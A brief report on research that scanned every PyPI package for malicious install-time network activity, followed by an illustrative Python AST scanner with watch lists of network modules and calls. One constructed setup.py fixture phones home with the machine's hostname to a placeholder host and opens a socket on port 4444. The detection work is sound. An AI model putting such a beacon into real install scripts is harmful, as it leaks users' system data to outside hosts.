Security experts worry that attackers are increasingly seeding popular package repositories with malicious code. Several projects kicked off this year to hunt for such Trojan horses. Stripe engineer Jordan Wright published the results of a home-brew research project that downloaded every package from the Python Package Index (PyPI) and analyzed it. He found hundreds of packages that opened network connections, behavior that merits scrutiny in a build or install script, but none of the scanned packages appeared outright malicious, Wright said in his analysis. He plans to extend the effort to monitor PyPI continuously and to add repositories for other platforms.
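The kind of check described above, as an added illustration rather than Wright's own tooling: a static scan of a package's setup.py that walks the parsed AST and reports imports of network modules and calls that open connections. The two setup.py sources, the module and call lists, and the function names are constructed for this example and are not from the original research.

```python
"""Static scan of Python install scripts for network activity.

Added illustration, not the scanner from the research described above.
It parses a setup.py with the standard `ast` module and reports imports
of network-capable modules plus calls that open a connection. A hit is a
reason to look closer, not proof of malice: plenty of legitimate packages
fetch resources at install time.
"""
import ast

# Modules that are unusual to see in a build script (assumed watch list).
NETWORK_MODULES = {"socket", "urllib", "urllib.request", "http.client",
                   "requests", "ftplib", "smtplib", "telnetlib"}

# Fully qualified call names that actually open a connection (assumed list).
NETWORK_CALLS = {"socket.socket", "socket.create_connection",
                 "urllib.request.urlopen", "urllib.request.urlretrieve",
                 "requests.get", "requests.post",
                 "http.client.HTTPConnection", "http.client.HTTPSConnection"}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(source, filename="setup.py"):
    """Return a sorted list of (lineno, kind, detail) findings for one file."""
    tree = ast.parse(source, filename=filename)
    findings = []
    aliases = {}  # local name -> real dotted name, so `import socket as s` is resolved

    # Pass 1: record imports and the aliases they introduce.
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[a.asname or a.name] = a.name
                if a.name in NETWORK_MODULES or a.name.split(".")[0] in NETWORK_MODULES:
                    findings.append((node.lineno, "import", a.name))
        elif isinstance(node, ast.ImportFrom) and node.module:
            root = node.module.split(".")[0]
            if node.module in NETWORK_MODULES or root in NETWORK_MODULES:
                findings.append((node.lineno, "import", node.module))
            for a in node.names:
                aliases[a.asname or a.name] = node.module + "." + a.name

    # Pass 2: resolve every call through the alias table and match it.
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name is None:
                continue
            head, _, rest = name.partition(".")
            real = aliases.get(head, head) + ("." + rest if rest else "")
            if real in NETWORK_CALLS:
                findings.append((node.lineno, "call", real))
    return sorted(findings)


# Constructed sample: an ordinary setup.py with no network activity.
CLEAN_SETUP = """\
from setuptools import setup
setup(name="harmless", version="1.0")
"""

# Constructed sample: phones home and opens a raw socket during install.
SUSPICIOUS_SETUP = """\
from setuptools import setup
import socket as s
from urllib.request import urlopen
import platform
urlopen("http://example.invalid/beacon?h=" + platform.node())
conn = s.create_connection(("example.invalid", 4444))
setup(name="suspicious", version="1.0")
"""


def triage(packages):
    """Map package name -> findings, keeping only packages with at least one hit."""
    return {name: scan_source(src) for name, src in packages.items()
            if scan_source(src)}


if __name__ == "__main__":
    for pkg, hits in triage({"harmless": CLEAN_SETUP,
                             "suspicious": SUSPICIOUS_SETUP}).items():
        for lineno, kind, detail in hits:
            print(f"{pkg}: line {lineno}: {kind} {detail}")
```

Resolving aliases before matching calls matters: `import socket as s` followed by `s.create_connection(...)` would slip past a plain string search for `socket.create_connection`. The scan is deliberately conservative and flags only a fixed set of connection-opening calls, so a second stage (sandboxed install with egress captured) is still needed to decide whether a flagged package is actually hostile.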

